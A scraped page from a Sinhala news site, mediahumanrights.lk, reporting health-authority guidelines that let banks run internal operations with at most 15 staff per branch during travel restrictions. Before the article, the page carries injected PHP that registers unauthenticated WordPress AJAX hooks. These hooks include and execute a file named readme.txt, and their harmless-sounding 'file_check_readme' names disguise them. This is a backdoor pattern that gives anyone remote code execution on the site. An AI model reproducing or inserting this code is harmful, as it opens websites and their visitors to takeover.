if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } බැංකු කටයුතු පවත්වාගෙන යාම සඳහා විශේෂ උපදෙස් මාලාවක් නිකුත් කෙරේ - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

බැංකු කටයුතු පවත්වාගෙන යාම සඳහා විශේෂ උපදෙස් මාලාවක් නිකුත් කෙරේ

සංචරණ සීමාවන් පවතින කාලයේ දී බැංකු කටයුතු පවත්වාගෙන යාම සඳහා අවසර ලබා දෙන ලෙස ඉල්ලා මහ බැංකු අධිපතිවරයා විසින් පොලිස්පතිවරායෙගන් ලිඛිත ඉල්ලීමක් සිදු කර තිබුණා. ඒ අනුව පොලිස්පතිවරයා එම ඉල්ලීම පිළිබඳ සෞඛ්‍ය සේවා අධ්‍යක්‍ෂ ජනරාල්වරයා වෙත දැනුම් දුන් අතර එහිදී  සෞඛ්‍ය සේවා අධ්‍යක්‍ෂ ජනරාල්වරයා විසින් බැංකු කටයුතු පවත්වාගෙන යාම සඳහා උපදෙස් මාලාවක් නිකුත් කර තිබෙනවා. 

එම උපදෙස් මාලාවට අනුව,

  • සියළුම බැංකු ශාඛා සහ බැංකු නොවන මූල්‍ය ආයතන සඳහා එක් ශාඛාවකට වරකට සේවකයින් 15ක උපරිමයට යටත්ව සේවකයින් කැඳවීමට අවසර හිමිවනවා.
  • එසේ කැඳවන සේවකයින් පිළිබඳ විස්තර අදාළ ශාඛා කළමණාකරු විසින් අදාළ පොලිස් ස්ථානය වෙත භාර දිය යුතුවනවා. 
  • එසේ භාර දුන් ලැස්යිස්තුවට අනුකූලව බැංකු කාර් ය මණ්ඩලයට සිය අනන්‍යතාව තහවුරු කර සේවයට වාර්තා කිරීමේ හැකියාව පවතිනවා. 

කෙසේ වෙතත් ගණුදෙනුකරුවන් වෙත බැංකු විවෘත කිරීමක් මෙහිදී සිදුනොවන අතර සංචරණ සීමා පනවා ඇති කාලසීමාවේ දී බැංකුවල අභ්‍යන්තර කටයුතු පවත්වාගෙන යාම සඳහා පමණක් මෙම අවසරය හිමිව තිබෙනවා. 

Related posts

මුහුද මතින් ඉදිවූ ලොව දිගම පාලම හෙට විවෘත වෙයි

Shiran Viraj

දිල්රූට රඟපාන්න ආසා හිතුණේ ඇයි?

Shiran Viraj

සුනාමියට හසුවී අතුරුදහන්වූ දරුවෙක් වසර 16 කට පසුව මව සොයා එයි

Shiran Viraj